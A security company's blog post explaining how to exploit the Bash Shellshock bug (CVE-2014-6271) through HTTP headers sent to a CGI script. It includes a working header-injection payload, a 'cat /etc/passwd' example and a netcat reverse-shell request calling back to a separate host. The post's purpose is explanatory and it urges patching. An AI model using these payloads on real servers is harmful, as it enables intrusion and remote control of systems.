News

Exploiting Shellshock

Oct 1, 2014

A lot of news articles are published currently about a series of Bugs which were found in Bash recently. This Post shows how to easily write a remote exploit for the first of these Bugs (CVE-2014-6271).

Let us first try to understand how this exploit works. The example test code to check if a bash installation is vulnerable which can be found on many sites is the following:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If this code is executed on a vulnerable system, the output will be

vulnerable 
this is a test

The command “env” is used to set a specific variable (in this example “$x”) within the environment before our test code ”echo this is a test” is executed. The vulnerability is, that bash interprets the string “() {” as the start of a function and evaluates the function before executing the desired command. Note, that the name of the Variable doesn’t matter for the vulnerability to work.

Let us look, how this can be used to remotely exploit a Webserver which uses bash script to deliver web pages. In order to investigate the things which happen here, we setup a small cgi-script with the following content:

#!/bin/bash
echo
env

If we browse to this page, we get a print of all environment variables which are set during the generation of our webpage. Let us browse to this page and set some extra HTTP Headers in advance. I used the Firefox AddOn “Modify Headers” to add the two HTTP-Headers: Foo: bar and Cookie: spam=ham.

Exploiting Shellshock

What we see in the response is, that several headers which are coming from the client are set as environment variable during execution. In each of these variables we can inject malicious code. This code will be executed before the webpage is delivered, regardless if it is used or not. Let us assume the Webserver executes the following Hello-World Webpage:

#!/bin/bash 
echo
echo "Hello World!"

Exploiting Shellshock

Note, that the Webpage itself does not use any user input at all. It just statically prints out “Hello World!”. However, as we have seen before bash uses our input.

We can first try to inject the example test code. Note, that we have to add an empty “echo” to the example in order to get the output to the content of the HTTP Request. (Apache will interpret this as a Response Header otherwise.)

Exploiting Shellshock

Instead of doing a simple echo, we can execute arbitrary code at the server like “cat /etc/passwd

Exploiting Shellshock

And of course open a reverse shell:

% echo |nc 192.168.122.27 80 <<EOF 
GET /cgi-bin/bash.cgi HTTP/1.1
Host: foo
Foo: () { :; }; /bin/nc -e /bin/bash 192.168.122.1 2222;

EOF

I hope everyone understood now that Shellshock can be exploited very easily. Patches are available and should be installed as soon as possible.

Recent posts

mgm sp @ Heise DevSec

With the topic “How practical is DevSecOps really? – A field report” our colleague Maximiliane Zirm is present at this year’s Heise devSec. 

read more

Tool Tuesday – nmap

One tool which should be installed on every pentester PC is nmap. This command line tool is the Swiss army knive for penetration tests on network level, but also used regularly by system administrators.

read more

mgm sp @ Munich

Our head office is located in the heart of Bavaria, since the time of SecureNet. Come have a look!

read more